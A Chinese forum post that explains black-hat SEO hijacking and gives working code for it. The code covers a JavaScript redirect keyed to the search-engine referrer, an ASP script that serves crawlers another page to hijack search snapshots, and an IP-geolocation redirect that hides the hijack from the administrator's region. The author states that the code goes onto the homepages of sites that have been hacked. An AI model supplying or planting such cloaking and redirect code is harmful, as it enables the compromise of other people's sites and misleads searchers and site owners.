实际上,楼主曾经是搞安全出身的。当然早期也对黑帽手法多少有些了解,最早08年开始,见证了百度一代又一代的黑帽手法,可谓百花齐放,大神大牛级人物层出不穷,但我想黑帽seo,先不谈其性质好坏,单单就技术本身来说也是值得去研究的,何况它的存在推动了搜索引擎的良性发展。
下午看了三木同学的一篇文章:话说蜘蛛劫持等黑猫seo手法及解决办法。事实上有很多白帽seo对黑帽手法了解的并不多,至于其中的原理可能更是理解的少了,但说到底黑帽seo的倾向于技术性的。所以为了普及一下广大seo,楼主来做一篇基础文章,至于以后会不会出高级操作教程,看情况了。
首先黑帽包括很多很多手法,技术含量也要求很高。比如举几个列子:流量劫持、快照劫持、泛域名、泛ip、变种ip、目录链轮、新闻源劫持、寄生虫程序、get程序、无限页面链轮等等 ,不止这些,而且还会不停的出新技能。
这篇文章来解释一下三木同学所遇到的问题吧:
1.劫持流量:
三木同学说劫持的时候会判断一下来路引擎,从百度来的时候才会跳转,正常输入网址是打开正常的。好,我们先看一下是怎么实现的,上代码:
<script LANGUAGE="Javascript">
var s=document.referrer
if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 )
location.href="http://www.hao123.com";
else
location.href="indax.php/index.asp/index.html"
</script>
代码解释:if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 ) 判断搜索引擎来源,如果来源正确,location.href="http://www.hao123.com";跳转到hao123网站。下面的代码是如果否,则打开正常首页。这段代码为js代码。只是一个简单的判断。
2、快照劫持
这个是有点技术含量的,需要的代码也不会那么简单,总之目的是把别人网站首页的快照变成自己的,然后别人输入网址打开的时候还是正常显示,判断来路之后才会跳转。想把快照换成自己想要的,得需要一段能改变蜘蛛看法的代码,代码类型很多,我这里写一种:
<%@ LANGUAGE = VBScript.Encode %><%
Dim agent
agent=Request.ServerVariables("http_user_agent")
If instr(agent,"Baiduspider") > 0 or instr(agent,"baidubrowser") > 0 or instr(agent,"Sogou") > 0 or instr(agent,"googlebot") > 0 or instr(agent,"Sosospider") > 0 then
linkurl="http://www.xxx.com" *快照网址
Function GetBody(Url)
Dim objXML
On Error Resume Next
Set objXML = CreateObject("Microsoft.XMLHTTP")
With objXML
.Open "Get", Url, False, "", ""
.Send
GetBody = .ResponseBody
End With
GetBody=BytesToBstr(GetBody,"GB2312")
Set objXML = Nothing
End Function
Function BytesToBstr(strBody,CodeBase)
dim objStream
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write strBody
objStream.Position = 0
objStream.Type = 2
objStream.Charset = CodeBase
BytesToBstr = objStream.ReadText
objStream.Close
set objStream = nothing
End Function
response.write GetBody(linkurl)
End if%>
<script LANGUAGE="Javascript">
var s=document.referrer
if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 )
location.href="http://www.baidu.com";
</script>
代码解释:前一段判断抓取蜘蛛来源,指向快照抓取网址;后一段代码判断来路,进行跳转到指定网址。这段代码其他地方暂不解释。
3、判断地区劫持流量
可能有时候怕管理发现,也不需要其他地区的没用流量。要怎么做呢。比如管理员是江西的,那么看代码:
<script src="http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js" charset="GB2312" ></script>
<script type=text/javascript>
if(remote_ip_info.province ==*江西*){这里指定地区
;这里为空表示不跳转 我们留空表示不跳转
}else{否则
window.location.href="http://www.hao123.com";如果不是上面地区 就跳转到这个网址
}
</script>
代码解释:http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js 为ip数据识别;其他代码看注释;
好了,今天就说这几个简单的手法吧,但有人要问了,要怎么实现呢,这些代码要放在什么地方?楼主淡淡的说:要放在别人网站的首页上。既然是劫持,肯定是劫持别人网站的了。那要怎么放进去呢?黑掉。 所以说黑帽是建立在非常高深的技术上面,然后结合seo理论,实现的一种高效转化流量的手段,当然,这里我们暂且不谈黑帽的持久性。
说实在的,楼主心里犹豫了很久,要不要写这篇文章,因为就好像楼主教大家怎么作弊一样。实际上大家看楼主以前的文章就知道,楼主专注黑帽三十载,这,只是喜欢研究而已。不想为互联网制造垃圾,也不想站长们辛辛苦苦做的站被人黑掉劫持掉。所以等以后有机会了,楼主也许会再发其他类似文章。楼主有时候也想写点心得,顺便征集大家的需求,比如:网站安全、防黑,当然白帽seo楼主也可以解答。:)